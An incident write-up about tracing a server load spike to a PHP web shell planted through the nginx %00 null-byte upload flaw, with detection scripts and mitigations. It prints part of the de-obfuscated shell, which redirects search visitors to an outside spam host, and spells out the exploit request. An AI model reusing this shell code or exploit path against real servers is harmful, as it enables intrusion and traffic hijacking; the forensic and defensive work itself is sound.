How a Nginx Null‑Byte Upload Vulnerability Fueled a Server Load Spike
A sudden 50% server load increase was traced to a malicious PHP file uploaded via an Nginx %00 null‑byte vulnerability, revealing how the exploit works, how it was detected, and steps to prevent future attacks.
During routine monitoring with Cacti, the author noticed two web servers whose CPU load spiked by about 50%. Initial checks showed php‑fpm processes briefly consuming 100% CPU, prompting a deeper investigation.
Investigation Steps
Using top, strace, and lsof, the author traced the high‑CPU php‑fpm processes to files under the BBS root directory. A custom script that hashes every file under the web root and compares the digests with an earlier run flagged an unexpected forums.php that had not been there before.
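The hashing check described above, written out as an added example (this is not the author's script): it hashes a web root into a baseline, stores the baseline, and on the next run reports files that were added, modified or removed, which is where a dropped web shell such as forums.php shows up. The directory layout, file names and the baseline location are constructed in a temporary directory purely for illustration.

```python
"""File-integrity baseline for a web root: hash every file, store the
digests, and report files added, modified or removed since the baseline.
Added example, not the original article's script; the sample tree below is
constructed in a temporary directory."""
import hashlib
import json
import os
import tempfile
from pathlib import Path


def hash_file(path: Path, algo: str = "sha256") -> str:
    """Stream the file so large attachments are not read into memory at once."""
    h = hashlib.new(algo)
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root: Path, skip_dirs=("data/cache",)) -> dict:
    """Map each regular file (relative POSIX path) under root to its digest."""
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root).as_posix()
        # Prune directories that legitimately churn (template caches etc.)
        # so the report is not drowned in noise.
        dirnames[:] = [d for d in dirnames
                       if (Path(rel_dir) / d).as_posix() not in skip_dirs]
        for name in filenames:
            p = Path(dirpath) / name
            if p.is_file() and not p.is_symlink():
                baseline[(Path(rel_dir) / name).as_posix()] = hash_file(p)
    return baseline


def diff_baseline(old: dict, new: dict) -> dict:
    """Classify changes; 'added' is where dropped web shells appear."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(k for k in set(old) & set(new) if old[k] != new[k]),
    }


def save_baseline(baseline: dict, dest: Path) -> None:
    # Keep the baseline outside the web root and unwritable by the php-fpm
    # user; otherwise an intruder simply re-hashes after dropping the shell.
    dest.write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(src: Path) -> dict:
    return json.loads(src.read_text())


def demo() -> dict:
    """Constructed scenario: take a baseline, then an attacker drops a shell
    into the forum root, tampers with an include and leaves a planted avatar."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "bbs"
        (root / "ucenter" / "data" / "tmp").mkdir(parents=True)
        (root / "index.php").write_text("<?php echo 'forum'; ?>")
        (root / "config.inc.php").write_text("<?php $dbhost = 'localhost'; ?>")
        baseline_file = Path(tmp) / "baseline.json"
        save_baseline(hash_tree(root), baseline_file)

        # Intrusion (constructed): web shell, modified include, planted avatar.
        (root / "forums.php").write_text("<?php error_reporting(E_ERROR); /* shell */ ?>")
        (root / "config.inc.php").write_text(
            "<?php $dbhost = 'localhost'; include 'forums.php'; ?>")
        (root / "ucenter" / "data" / "tmp" / "upload545562.jpg").write_bytes(
            b"\xff\xd8\xff\xe0<?php /* payload */ ?>")

        return diff_baseline(load_baseline(baseline_file), hash_tree(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Run it from cron against the real web root and alert on a non-empty "added" or "modified" list; legitimate deployments are handled by re-running save_baseline as part of the deploy step.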
Malicious File Analysis
The discovered forums.php contained heavily obfuscated PHP that redirected visitors based on the HTTP Referer header and fetched additional payloads from http://localtemp.665203.com/server.php. Once de‑obfuscated it turned out to be a web shell used for search‑engine spam: visitors arriving from Baidu or Google search results are bounced to the spammer's redirector, while requests without such a referrer fall through to the rest of the script (elided below).
<?php
// Only fatal errors are reported, so the undefined HTTP_REFERER on direct
// visits never shows up in the server's error log.
error_reporting(E_ERROR);
$domain=$_SERVER['SERVER_NAME'];
$dddd = $_SERVER['PHP_SELF'];
$qqqq=$_SERVER["QUERY_STRING"];
// Last path segment of the requested script (end() on a temporary only
// raises a notice, which the error_reporting() call above silences).
$filename = end(explode('/',$dddd));
// Visitors arriving from Baidu or Google search results are bounced to the
// spammer's redirector; everyone else falls through to the elided code.
if(stristr($_SERVER['HTTP_REFERER'],'baidu.com/')) {
Header("Location: http://jump.1310.net/jump.php?".$_SERVER['HTTP_REFERER']);
} else if(stristr($_SERVER['HTTP_REFERER'],'google.com.hk/search?')) {
Header("Location: http://jump.1310.net/jump.php?".$_SERVER['HTTP_REFERER']);
} /* ... */
?>
Removing the file immediately reduced the server load, confirming it as the cause.
Root Cause: Nginx %00 Null‑Byte Upload Vulnerability
Log analysis showed how forums.php got there. The attacker first uploaded an avatar, a JPEG containing PHP code, which landed under /ucenter/data/tmp/, and then requested it as POST /ucenter/data/tmp/upload545562.jpg%00.php. On the affected Nginx versions the %00 is decoded to a literal null byte and the URI is matched against the PHP location as if it ended in .php, so the request is handed to php‑fpm; because the path travels as a NUL‑terminated C string, the file php‑fpm actually opens and executes is upload545562.jpg. The PHP embedded in the image then wrote forums.php into the forum root. Versions vulnerable include nginx 0.5.*, 0.6.*, 0.7 ≤ 0.7.65, and 0.8 ≤ 0.8.37. Upgrading Nginx to ≥ 1.0.12 resolved the issue.
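To make the mechanism concrete, here is an added example (not code from the article or from nginx) that models the two halves of the bug, the location match on a URI that still contains the decoded null byte and the C‑string truncation when php‑fpm opens the file, and then scans access‑log lines for requests whose URI decodes to a null byte. The `\.php$` location regex, the document root /var/www/bbs and every log line are constructed assumptions; the exploit URI is the one quoted above.

```python
"""Model of the nginx %00 path-truncation bug plus a detector for it in
access logs.  Added example, not from the original article: the location
regex, the docroot and every log line below are constructed for illustration."""
import re
from urllib.parse import unquote

# The usual PHP location block ("location ~ \.php$") tests the *decoded* URI.
PHP_SUFFIX = re.compile(r"\.php$")


def nginx_selects_php_handler(uri: str, patched: bool) -> bool:
    """Model of location matching.

    Vulnerable versions keep the decoded NUL inside the URI and run the suffix
    match over it, so '...upload545562.jpg\\0.php' is routed to FastCGI.
    Current nginx rejects a decoded NUL with 400 Bad Request before matching.
    """
    decoded = unquote(uri)
    if "\x00" in decoded and patched:
        return False
    return bool(PHP_SUFFIX.search(decoded))


def script_actually_executed(docroot: str, uri: str) -> str:
    """SCRIPT_FILENAME travels as a NUL-terminated C string; stat()/open() in
    php-fpm stop at the first NUL, so the .jpg, not a .php, is executed."""
    return (docroot + unquote(uri)).split("\x00", 1)[0]


# Combined log format: ip ident user [time] "METHOD URI PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def find_null_byte_requests(log_lines):
    """Return (ip, method, uri, status) for requests whose URI decodes to a
    NUL.  nginx logs $request raw, so the '%00' survives in the access log."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and "\x00" in unquote(m.group("uri")):
            hits.append((m.group("ip"), m.group("method"),
                         m.group("uri"), m.group("status")))
    return hits


# Constructed sample traffic (not real log data): avatar upload, the %00
# request that executes it, a search visitor hitting the dropped shell, and a
# harmless direct fetch of the same image.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Sep/2011:03:14:02 +0800] "POST /ucenter/index.php HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Sep/2011:03:14:09 +0800] "POST /ucenter/data/tmp/upload545562.jpg%00.php HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Sep/2011:03:15:41 +0800] "GET /forums.php HTTP/1.1" 302 0 "http://www.baidu.com/s?wd=test" "Mozilla/5.0"',
    '192.0.2.44 - - [12/Sep/2011:03:15:50 +0800] "GET /ucenter/data/tmp/upload545562.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    uri = "/ucenter/data/tmp/upload545562.jpg%00.php"
    print("vulnerable routes to PHP:", nginx_selects_php_handler(uri, patched=False))
    print("patched routes to PHP:   ", nginx_selects_php_handler(uri, patched=True))
    print("file php-fpm runs:       ", script_actually_executed("/var/www/bbs", uri))
    for hit in find_null_byte_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```

The detector only looks at the URI; in a real hunt also pull every request from the hitting IP and any file under the upload directory that was requested with a .php suffix, since that pairing is the signature of this exploit.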
Lessons Learned
Stay informed about security advisories; the Nginx %00 bug was disclosed in July 2011.
Regularly verify file integrity with a hash baseline (SHA‑256 rather than MD5 where possible) to detect unauthorized changes quickly, and keep the baseline outside the web root where the php‑fpm user cannot rewrite it.
Restrict write permissions on web‑root directories to limit the impact of file‑upload attacks, and make sure directories that must stay writable (avatars, attachments, tmp) can never be executed as PHP: exclude them from the Nginx PHP location, and let php‑fpm enforce security.limit_extensions (available since PHP 5.3.9) so a resolved file name ending in .jpg is refused even if the web server routes it to PHP.
Implement continuous monitoring and set alerts for abnormal CPU usage to enable rapid response.
By applying these measures, the risk of similar web‑shell infections can be significantly reduced.
ITPUB